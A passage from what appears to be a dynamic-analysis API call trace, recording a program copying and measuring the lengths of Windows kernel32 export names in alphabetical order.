lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.434] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.434] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.434] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.434] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.434] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.434] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.434] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.434] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.434] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.434] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.434] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.434] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.434] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.434] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.434] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.434] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.434] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.434] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.434] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.434] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.434] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.434] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.435] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.435] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.435] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.435] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.435] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.435] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.435] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.435] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.435] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.435] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.435] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.435] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.435] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.435] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.435] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.435] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.435] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.435] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.435] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.435] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.435] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.435] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.435] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.435] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.435] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.435] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.435] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.435] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.435] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.435] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.435] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.435] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.435] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.435] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.435] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.435] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.435] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.435] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.436] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.436] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.436] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.436] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.436] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.436] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.436] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0078.436] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.436] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0078.436] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.436] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.436] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.436] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.436] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.436] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.436] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.436] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.436] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.436] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.436] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.436] lstrlenA (lpString="COPYFILEA") returned 9 [0078.436] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0078.436] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.436] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.436] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.436] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.436] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.436] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.436] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.436] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.436] lstrlenA (lpString="COPYFILEW") returned 9 [0078.436] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0078.436] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.436] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.436] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.436] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.437] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.437] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.437] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.437] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.437] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.437] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.437] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.437] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.437] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.437] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.437] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.437] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.437] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.437] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.437] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.437] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.437] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.437] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.437] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.437] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.437] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.437] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.437] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.437] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.437] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.437] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0078.437] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.437] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.437] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.437] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.437] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.437] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.437] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.437] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.437] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.437] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.437] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.438] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.438] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.438] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.438] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.438] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.438] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.438] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.438] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.438] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.438] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.438] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.438] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.438] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.438] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.438] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.438] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.438] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.438] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.438] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.438] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.438] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.438] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.438] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.438] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.438] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.438] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.438] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.438] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.438] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.438] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.438] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0078.438] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.438] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.438] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.438] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.438] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.438] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.439] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.439] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.439] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0078.439] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.439] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.439] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.439] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.439] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.439] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.439] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.439] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.439] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.439] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.439] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.439] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.439] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.439] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.439] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.439] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.439] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.439] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.439] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.439] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.439] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.439] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0078.439] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.439] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.439] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.439] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.439] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.439] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0078.439] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.439] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.439] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.439] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.439] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.439] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.440] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.440] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.440] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.440] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.440] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.440] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.440] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.440] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.440] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.440] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.440] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.440] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.440] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.440] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.440] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.440] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.440] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.440] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.440] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.440] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.440] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.440] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.440] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.440] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.440] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.440] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.440] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.440] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.440] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.440] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.440] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.440] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.440] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.440] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.440] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.440] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.441] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.441] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.441] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.441] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.441] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.441] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0078.441] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.441] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.441] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.441] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.441] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.441] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.441] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.441] lstrlenA 